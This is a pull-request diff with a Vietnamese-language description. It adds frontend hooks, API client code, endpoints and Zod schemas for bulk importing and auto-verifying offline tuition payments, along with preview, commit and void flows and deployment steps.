+    },
+    onError: async (error) => {
+      // responseType:'blob' → body lỗi (JSON) bị bọc thành Blob → đọc text để lấy
+      // detail thật thay vì luôn fallback.
+      let msg = "Không tải được file mẫu"
+      const data = error.response?.data as unknown
+      if (data instanceof Blob) {
+        try {
+          const parsed = JSON.parse(await data.text())
+          if (typeof parsed?.detail === "string") msg = parsed.detail
+        } catch {
+          /* blob không phải JSON → giữ fallback */
+        }
+      } else {
+        msg = errMsg(error, msg)
+      }
+      toast.error(msg)
+    },
+  })
+}
+
+// ============================================================================
+// PHA 1 — PREVIEW (dry-run)
+// ============================================================================
+export function usePreviewPaymentImport() {
+  return useMutation<
+    PaymentImportPreview,
+    AxiosError<ApiErrorResponse>,
+    { file: File; academicYear: number; semesterNo: number }
+  >({
+    mutationFn: (vars) => paymentImportApi.preview(vars),
+    onError: (error) =>
+      toast.error(errMsg(error, "Không xem trước được file import")),
+  })
+}
+
+// ============================================================================
+// PHA 2 — COMMIT (ghi tiền)
+// ============================================================================
+export function useCommitPaymentImport() {
+  const queryClient = useQueryClient()
+  return useMutation<PaymentImportCommit, AxiosError<ApiErrorResponse>, number>({
+    mutationFn: (batchId) => paymentImportApi.commit(batchId),
+    onSuccess: (result) => {
+      toast.success(
+        `Đã ghi ${result.committed_count} dòng` +
+          (result.failed_count > 0 ? `, ${result.failed_count} lỗi` : ""),
+      )
+      queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
+    },
+    onError: (error) => toast.error(errMsg(error, "Không ghi được tiền lô import")),
+  })
+}
+
+// ============================================================================
+// VOID (đảo lô) — manager/admin
+// ============================================================================
+export function useVoidPaymentImport() {
+  const queryClient = useQueryClient()
+  return useMutation<
+    PaymentImportVoidResult,
+    AxiosError<ApiErrorResponse>,
+    { batchId: number; reason: string }
+  >({
+    mutationFn: ({ batchId, reason }) =>
+      paymentImportApi.voidBatch(batchId, reason),
+    onSuccess: (result) => {
+      toast.success(`Đã đảo lô — rút lại ${result.reversed_count} khoản`)
+      queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
+    },
+    onError: (error) => toast.error(errMsg(error, "Không đảo được lô import")),
+  })
+}

--- a/frontend/src/lib/api/endpoints.ts
+++ b/frontend/src/lib/api/endpoints.ts
@@ -274,6 +274,14 @@ export const API_ENDPOINTS = {
         CREATE: "/api/payments/intents",
         DETAIL: (intentId: number) => `/api/payments/intents/${intentId}`,
       },
+      // Bulk payment import (BV — kế toán thu offline → import → tự xác minh)
+      IMPORT: {
+        TEMPLATE: "/api/payments/import/template",
+        PREVIEW: "/api/payments/import/preview",
+        COMMIT: (batchId: number) => `/api/payments/import/${batchId}/commit`,
+        VOID: (batchId: number) => `/api/payments/import/${batchId}/void`,
+        BATCHES: "/api/payments/import/batches",
+      },
     },
 
     // Lookup data

--- a/frontend/src/lib/api/endpoints.ts
+++ b/frontend/src/lib/api/endpoints.ts
@@ -281,6 +281,11 @@ export const API_ENDPOINTS = {
         COMMIT: (batchId: number) => `/api/payments/import/${batchId}/commit`,
         VOID: (batchId: number) => `/api/payments/import/${batchId}/void`,
         BATCHES: "/api/payments/import/batches",
+        // BV-5 R2/R1: chi tiết lô (per-row) + tải file kết quả
+        BATCH_DETAIL: (batchId: number) =>
+          `/api/payments/import/batches/${batchId}`,
+        RESULT: (batchId: number) =>
+          `/api/payments/import/batches/${batchId}/result`,
       },
     },
 

--- a/frontend/src/lib/api/payment-import.ts
+++ b/frontend/src/lib/api/payment-import.ts
@@ -13,10 +13,12 @@
 import { api } from "./client"
 import { API_ENDPOINTS } from "./endpoints"
 import {
+  paymentImportBatchDetailSchema,
   paymentImportBatchListSchema,
   paymentImportCommitSchema,
   paymentImportPreviewSchema,
   paymentImportVoidSchema,
+  type PaymentImportBatchDetail,
   type PaymentImportBatchList,
   type PaymentImportCommit,
   type PaymentImportPreview,
@@ -73,10 +75,32 @@ async function listBatches(
   return paymentImportBatchListSchema.parse(res.data)
 }
 
+/** BV-5 R2: chi tiết 1 lô + per-row (xem lại sau commit). */
+async function getBatchDetail(
+  batchId: number,
+): Promise<PaymentImportBatchDetail> {
+  const res = await api.get(IMPORT.BATCH_DETAIL(batchId))
+  return paymentImportBatchDetailSchema.parse(res.data)
+}
+
+/** BV-5 R1: tải file kết quả (nguyên dòng gốc + cột Trạng thái/Lý do). Trả Blob. */
+async function downloadResult(
+  batchId: number,
+  format: "xlsx" | "csv",
+): Promise<Blob> {
+  const res = await api.get<Blob>(IMPORT.RESULT(batchId), {
+    params: { format },
+    responseType: "blob",
+  })
+  return res.data
+}
+
 export const paymentImportApi = {
   downloadTemplate,
   preview,
   commit,
   voidBatch,
   listBatches,
+  getBatchDetail,
+  downloadResult,
 }

--- a/frontend/src/lib/api/payment-import.ts
+++ b/frontend/src/lib/api/payment-import.ts
@@ -1,0 +1,82 @@
+/**
+ * Payment Import API client (BV-4) — import file thu học phí hàng loạt.
+ *
+ * 5 route (Backend_FastAPI/app/routers/payments.py):
+ *   GET  /import/template?format=xlsx|csv   → tải file mẫu (blob)
+ *   POST /import/preview (multipart)         → dry-run 3 nhóm matched/warned/error
+ *   POST /import/{id}/commit                 → ghi tiền (auto-verify)
+ *   POST /import/{id}/void {reason}          → đảo lô (manager/admin)
+ *   GET  /import/batches                     → lịch sử lô (phân trang)
+ *
+ * Response parse qua Zod (mirror backend) → bắt drift contract sớm.
+ */
+import { api } from "./client"
+import { API_ENDPOINTS } from "./endpoints"
+import {
+  paymentImportBatchListSchema,
+  paymentImportCommitSchema,
+  paymentImportPreviewSchema,
+  paymentImportVoidSchema,
+  type PaymentImportBatchList,
+  type PaymentImportCommit,
+  type PaymentImportPreview,
+  type PaymentImportVoidResult,
+} from "@/lib/zod/payment-import"
+
+const IMPORT = API_ENDPOINTS.FINANCE.PAYMENTS.IMPORT
+
+/** Tải file mẫu import (xlsx khuyến nghị / csv). Trả Blob để trigger download. */
+async function downloadTemplate(format: "xlsx" | "csv"): Promise<Blob> {
+  const res = await api.get<Blob>(`${IMPORT.TEMPLATE}?format=${format}`, {
+    responseType: "blob",
+  })
+  return res.data
+}
+
+/** Pha 1: xem trước (dry-run) — KHÔNG ghi tiền. multipart file + năm + kỳ. */
+async function preview(params: {
+  file: File
+  academicYear: number
+  semesterNo: number
+}): Promise<PaymentImportPreview> {
+  const form = new FormData()
+  form.append("file", params.file)
+  form.append("academic_year", String(params.academicYear))
+  form.append("semester_no", String(params.semesterNo))
+  const res = await api.post(IMPORT.PREVIEW, form)
+  return paymentImportPreviewSchema.parse(res.data)
+}
+
+/** Pha 2: ghi tiền (auto-verify) các dòng MATCHED/WARNING của lô. */
+async function commit(batchId: number): Promise<PaymentImportCommit> {
+  const res = await api.post(IMPORT.COMMIT(batchId))
+  return paymentImportCommitSchema.parse(res.data)
+}
+
+/** Đảo (void) lô đã ghi tiền — rút lại toàn bộ Payment. Gate manager/admin. */
+async function voidBatch(
+  batchId: number,
+  reason: string,
+): Promise<PaymentImportVoidResult> {
+  const res = await api.post(IMPORT.VOID(batchId), { reason })
+  return paymentImportVoidSchema.parse(res.data)
+}
+
+/** Lịch sử lô import (mới nhất trước), phân trang. */
+async function listBatches(
+  page: number,
+  pageSize: number,
+): Promise<PaymentImportBatchList> {
+  const res = await api.get(IMPORT.BATCHES, {
+    params: { page, page_size: pageSize },
+  })
+  return paymentImportBatchListSchema.parse(res.data)
+}
+
+export const paymentImportApi = {
+  downloadTemplate,
+  preview,
+  commit,
+  voidBatch,
+  listBatches,
+}

--- a/frontend/src/lib/config/navigation.ts
+++ b/frontend/src/lib/config/navigation.ts
@@ -36,6 +36,7 @@ import {
   Trash2,
   TrendingUp,
   Trello,
+  Upload,
   UserCheck,
   Users,
   WalletCards,
@@ -181,6 +182,13 @@ export const navigationConfig: NavigationConfig = {
           label: "Thu học phí",
           href: "/finance/invoices",
           icon: Receipt,
+          roles: ["accountant", "manager", "admin"],
+        },
+        {
+          // Import file tổng hợp → tự xác minh thanh toán hàng loạt (BV)
+          label: "Import thu học phí",
+          href: "/finance/payments/import",
+          icon: Upload,
           roles: ["accountant", "manager", "admin"],
         },
         {

--- a/frontend/src/lib/utils/download-blob.ts
+++ b/frontend/src/lib/utils/download-blob.ts
@@ -1,0 +1,40 @@
+/**
+ * Tiện ích tải Blob về máy (dùng chung — tránh lặp logic createObjectURL/revoke).
+ */
+import { AxiosError } from "axios"
+
+/** Trigger browser download của 1 Blob qua thẻ <a download> tạm (cleanup revoke). */
+export function downloadBlob(blob: Blob, filename: string): void {
+  const url = URL.createObjectURL(blob)
+  const link = document.createElement("a")
+  link.href = url
+  link.download = filename
+  document.body.appendChild(link)
+  link.click()
+  link.remove()
+  URL.revokeObjectURL(url)
+}
+
+/**
+ * Lấy message lỗi khi tải blob: vì `responseType:'blob'`, body lỗi (JSON) bị axios bọc
+ * thành Blob → phải đọc `.text()` rồi parse mới ra `detail` thật (không thì luôn fallback).
+ */
+export async function blobErrorMessage(
+  error: AxiosError,
+  fallback: string,
+): Promise<string> {
+  const data = error.response?.data as unknown
+  if (data instanceof Blob) {
+    try {
+      const parsed = JSON.parse(await data.text())
+      if (typeof parsed?.detail === "string") return parsed.detail
+    } catch {
+      /* blob không phải JSON → giữ fallback */
+    }
+  } else if (
+    typeof (data as { detail?: unknown } | undefined)?.detail === "string"
+  ) {
+    return (data as { detail: string }).detail
+  }
+  return fallback
+}

--- a/frontend/src/lib/zod/payment-import.ts
+++ b/frontend/src/lib/zod/payment-import.ts
@@ -108,6 +108,14 @@ export const paymentImportBatchListSchema = z.object({
 })
 export type PaymentImportBatchList = z.infer<typeof paymentImportBatchListSchema>
 
+// BV-5 R2: lô + chi tiết từng dòng (xem lại per-row sau commit)
+export const paymentImportBatchDetailSchema = paymentImportBatchSummarySchema.extend({
+  rows: z.array(paymentImportRowSchema).default([]),
+})
+export type PaymentImportBatchDetail = z.infer<
+  typeof paymentImportBatchDetailSchema
+>
+
 // ============================================================================
 // FORM SCHEMAS (local)
 // ============================================================================

--- a/frontend/src/lib/zod/payment-import.ts
+++ b/frontend/src/lib/zod/payment-import.ts
@@ -1,0 +1,179 @@
+/**
+ * Zod schemas + types cho Import file thu học phí hàng loạt (BV-4).
+ *
+ * Mirror CHÍNH XÁC backend `app/schemas/finance.py` (PaymentImport*).
+ * Decimal → JSON string (như các schema finance khác). status để z.string()
+ * (xử lý unknown qua config map default — CLAUDE.md rule 3).
+ *
+ * @see Backend_FastAPI/app/schemas/finance.py
+ * @see Backend_FastAPI/app/routers/payments.py (5 route import)
+ */
+import { z } from "zod"
+
+import { formatVND } from "@/lib/zod/finance"
+
+/** Format tiền an toàn: null/rỗng/non-numeric → "—" (tránh "NaN ₫"). */
+export function formatAmount(amount?: string | null): string {
+  if (amount == null || amount === "" || Number.isNaN(Number(amount))) return "—"
+  return formatVND(amount)
+}
+
+// ============================================================================
+// RESPONSE SCHEMAS (mirror backend)
+// ============================================================================
+export const paymentImportAllocationSchema = z.object({
+  invoice_id: z.number().int(),
+  installment_no: z.number().int(),
+  amount: z.string(),
+})
+export type PaymentImportAllocation = z.infer<typeof paymentImportAllocationSchema>
+
+export const paymentImportRowSchema = z.object({
+  row_no: z.number().int(),
+  status: z.string(), // matched | warned | error
+  message: z.string().nullable().optional(),
+  citizen_id: z.string().nullable().optional(),
+  profile_id: z.number().int().nullable().optional(),
+  fee_id: z.number().int().nullable().optional(),
+  amount: z.string().nullable().optional(),
+  method_code: z.string().nullable().optional(),
+  payment_date: z.string().nullable().optional(),
+  reference: z.string().nullable().optional(),
+  allocations: z.array(paymentImportAllocationSchema).default([]),
+  payment_ids: z.array(z.number().int()).nullable().optional(),
+})
+export type PaymentImportRow = z.infer<typeof paymentImportRowSchema>
+
+export const paymentImportPreviewSchema = z.object({
+  batch_id: z.number().int(),
+  academic_year: z.number().int(),
+  semester_no: z.number().int(),
+  file_name: z.string(),
+  status: z.string(),
+  row_count: z.number().int(),
+  matched_count: z.number().int(),
+  warned_count: z.number().int(),
+  failed_count: z.number().int(),
+  total_amount: z.string(),
+  rows: z.array(paymentImportRowSchema).default([]),
+})
+export type PaymentImportPreview = z.infer<typeof paymentImportPreviewSchema>
+
+export const paymentImportCommitSchema = z.object({
+  batch_id: z.number().int(),
+  status: z.string(),
+  committed_count: z.number().int(),
+  failed_count: z.number().int(),
+  payment_count: z.number().int(),
+  total_amount: z.string(),
+  rows: z.array(paymentImportRowSchema).default([]),
+})
+export type PaymentImportCommit = z.infer<typeof paymentImportCommitSchema>
+
+export const paymentImportVoidSchema = z.object({
+  batch_id: z.number().int(),
+  status: z.string(),
+  reversed_count: z.number().int(),
+  reversed_amount: z.string(),
+  void_reason: z.string().nullable().optional(),
+})
+export type PaymentImportVoidResult = z.infer<typeof paymentImportVoidSchema>
+
+export const paymentImportBatchSummarySchema = z.object({
+  id: z.number().int(),
+  academic_year: z.number().int(),
+  semester_no: z.number().int(),
+  file_name: z.string(),
+  status: z.string(), // preview | committed | void
+  row_count: z.number().int(),
+  matched_count: z.number().int(),
+  warned_count: z.number().int(),
+  failed_count: z.number().int(),
+  total_amount: z.string(),
+  created_at: z.string(),
+  committed_at: z.string().nullable().optional(),
+  voided_at: z.string().nullable().optional(),
+  // BE quyết quyền đảo lô của người xem (thin-client: FE đọc flag, không check role)
+  can_void: z.boolean().default(false),
+})
+export type PaymentImportBatchSummary = z.infer<
+  typeof paymentImportBatchSummarySchema
+>
+
+export const paymentImportBatchListSchema = z.object({
+  items: z.array(paymentImportBatchSummarySchema).default([]),
+  total: z.number().int(),
+  page: z.number().int(),
+  page_size: z.number().int(),
+})
+export type PaymentImportBatchList = z.infer<typeof paymentImportBatchListSchema>
+
+// ============================================================================
+// FORM SCHEMAS (local)
+// ============================================================================
+// Lưu ý: KHÔNG dùng `invalid_type_error` (API Zod v3, bị Zod v4 bỏ qua → message
+// chết). Đặt message ở .int()/.min()/.max(); giá trị rỗng/NaN/thập phân đều rơi vào
+// 1 trong các check này nên luôn ra message tiếng Việt.
+export const paymentImportPreviewFormSchema = z.object({
+  academic_year: z.coerce
+    .number()
+    .int("Năm học phải là số nguyên")
+    .min(2020, "Năm học từ 2020")
+    .max(2100, "Năm học đến 2100"),
+  semester_no: z.coerce
+    .number()
+    .int("Học kỳ phải là số nguyên")
+    .min(1, "Học kỳ từ 1")
+    .max(12, "Học kỳ đến 12"),
+})
+export type PaymentImportPreviewForm = z.infer<
+  typeof paymentImportPreviewFormSchema
+>
+
+export const paymentImportVoidFormSchema = z.object({
+  reason: z
+    .string()
+    .trim()
+    .min(3, "Lý do đảo lô tối thiểu 3 ký tự")
+    .max(500, "Lý do tối đa 500 ký tự"),
+})
+export type PaymentImportVoidForm = z.infer<typeof paymentImportVoidFormSchema>
+
+// ============================================================================
+// STATUS CONFIG (badge) — handle unknown qua fallback ở component
+// ============================================================================
+export const ROW_STATUS_CONFIG: Record<
+  string,
+  { label: string; className: string }
+> = {
+  matched: {
+    label: "Khớp",
+    className: "border-green-200 bg-green-100 text-green-800",
+  },
+  warned: {
+    label: "Cảnh báo",
+    className: "border-amber-200 bg-amber-100 text-amber-800",
+  },
+  error: {
+    label: "Lỗi",
+    className: "border-red-200 bg-red-100 text-red-800",
+  },
+}
+
+export const BATCH_STATUS_CONFIG: Record<
+  string,
+  { label: string; className: string }
+> = {
+  preview: {
+    label: "Xem trước",
+    className: "border-blue-200 bg-blue-100 text-blue-800",
+  },
+  committed: {
+    label: "Đã ghi tiền",
+    className: "border-green-200 bg-green-100 text-green-800",
+  },
+  void: {
+    label: "Đã đảo",
+    className: "border-gray-200 bg-gray-100 text-gray-700",
+  },
+}


### PR DESCRIPTION
## Tóm tắt

Kế toán **thu học phí offline** (tiền mặt / chuyển khoản), cuối kỳ tổng hợp file → **import** → hệ thống **tự xác minh hàng loạt** (bulk auto-verify) số đã thu. Tầng **Finance/Reconciliation**, upstream của xuất hóa đơn MISA (payment phải `verified` mới đủ điều kiện xuất HĐ); nối roadmap Casso/SePay.

Luồng **2 pha**: `POST /payments/import/preview` (dry-run, **KHÔNG ghi tiền**) → `POST /payments/import/{id}/commit` (auto-verify dòng khớp). Đảo được bằng `void`.

## Nghiệp vụ đã chốt
- Khóa = **CCCD** (`AdmissionProfile.citizen_id`, unique theo năm) + **năm học/học kỳ** chọn ở cấp batch.
- Chọn đợt **FIFO principal-first** (chỉ GỐC học phí, không gồm phạt); thu tràn nhiều đợt → cảnh báo + tự phân bổ.
- Thu **vượt tổng nợ gốc → LỖI**; đợt **chưa phát hành HĐ (draft) → LỖI** (bulk KHÔNG tự phát hành).
- Lệch tên → cảnh báo (vẫn ghi). Hình thức `TM→cash`, `CK→bank_transfer`.
- **Maker-checker**: kế toán = maker (`created_by`), `system_user` = checker (`verified_by`) → thỏa constraint chống tự duyệt.

## Các phần
| Phần | Nội dung |
|---|---|
| **BV-1** | Schema `payment_import_batch` + `payment_import_row` + migration |
| **BV-2** | Parse template + resolve/validate (preview read-only) + Casbin grant |
| **BV-3** | Auto-verify commit (RE-VALIDATE TOCTOU dưới khóa, savepoint per-row, gộp lead-sync) |
| **BV-3.5** | Void lô — đảo tiền + mở lại file re-import + hardening concurrency/refund |
| **BV-4** | Frontend (upload / preview / commit / history / void) + `can_void` thin-client |
| **BV-5** | Truy vết: G1 cảnh báo trùng CCCD + G2 chặn thu khống + detail / file kết quả |
| **BV-6** | Void tự **lùi lead** khỏi sts10 về status cũ (đối xứng forward sync) |

## An toàn tiền (bất biến chính)
- Idempotency: `file_sha256` (partial-unique, chống re-import) + `PaymentTransaction.idempotency_key`.
- Commit **RE-VALIDATE dưới khóa** (TOCTOU); savepoint per-row → 1 dòng lỗi không abort cả lô.
- Lock order **invoice→fee** khớp `verify_payment` (tránh deadlock ABBA).
- Money-math **1 helper dùng chung** (`apply_verified_payment_balances` / `reverse_payment_balances`) — verify-tay + bulk + refund cùng đường, không drift.
- Void coordinate với refund subsystem (chặn double-reverse; serialize qua khóa Payment row); **flush đảo tiền NGOÀI savepoint** trước vòng lùi-lead (lỗi projection không cuốn theo tiền).
- IDOR unit-scope theo **đơn vị người tạo lô** (commit / void / list / detail).
- Parse số tiền VN robust: `7.200.000` / `7,200,000` / `500,000`=500000 (`,` đơn + 3 số = nghìn) / NBSP; cap tràn `Numeric(15,2)`; chống formula-injection ở file kết quả.

## Test
- **~290 backend test** (service + API authz + integration money-math + lead-sync) — xanh.
- **Chrome smoke dev FULL-FLOW PASS** (login → upload → preview → commit → history → void; DB net-zero).
- Test trên **DATA PROD thật** (file 254 dòng → 104 CCCD): preview 56 khớp / 9 cảnh báo / 39 lỗi; commit 64 payment.
- Qua **nhiều vòng `/code-review max`** (bắt + sửa cả 1 bug money-integrity: flush đảo tiền bị savepoint cuốn theo).
- flake8 sạch (file feature).

## ⚠️ Deploy (BẮT BUỘC — theo thứ tự)
1. `alembic upgrade head` — **1 migration tạo bảng** + **4 Casbin grant** (preview / commit / void / read).
2. **RESTART backend SAU migration** — Casbin nạp policy lúc startup; quên restart → accountant/manager **403** khi import.
3. Đảm bảo user **`username='system'`** tồn tại (đã có nếu auto-verify lệ phí hồ sơ đang chạy prod) — auto-verify cần làm checker; thiếu → commit raise `ConflictError`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
